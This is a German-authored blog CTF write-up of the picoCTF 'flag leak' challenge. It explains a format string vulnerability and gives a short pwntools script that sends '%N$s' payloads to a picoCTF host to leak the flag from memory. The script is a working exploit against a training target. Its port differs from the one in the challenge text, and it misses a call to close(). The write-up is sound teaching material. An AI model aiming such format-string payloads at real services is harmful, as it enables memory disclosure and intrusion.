Ulli Weichert/ April 4, 2022/ IT-Security, Write-Ups/ 0Kommentare

flag leak

Description

Story telling class 1/2
I'm just copying and pasting with this program. What can go wrong? You can view source here. And connect with it using:
nc saturn.picoctf.net 51385

Solving

This is a format string attack. So if we use some magic to send some format strings to the app, this should get us the flag.

Here is my solve.py - it will send the format string 30 times against the application.

#!/usr/bin/env python

from pwn import *

host,port = 'saturn.picoctf.net', 52999

for i in range(30):
    s = remote(host,port)
    s.recvuntil(b'>>')
    s.sendline('%' + str(i) + '$s')
    print(s.recvuntil(b'-'))
    print(i), print(s.recv())
    s.close
Share this Post

Über Ulli Weichert

2004 fing Ulli bei der Bundeswehr als Ausbilder und IT-Spezialist an. 2011 hat Ulli eine Umschulung zum Fachinformatiker für Systemintegration absolviert und sich auf Linux spezialisiert. 2016 hat Ulli dann bei einem mittelständischem Unternehmen, welches Kunden in ganz Deutschland betreut, als Linuxadministrator angefangen und kümmert sich seither nebst, Netzwerk, Security, Firewall, Storage überwiegend um Linuxthemen aller Art. Seit kurzem hat auch Ihn das Thema Container und k8s erwischt.

Hinterlasse einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

*
*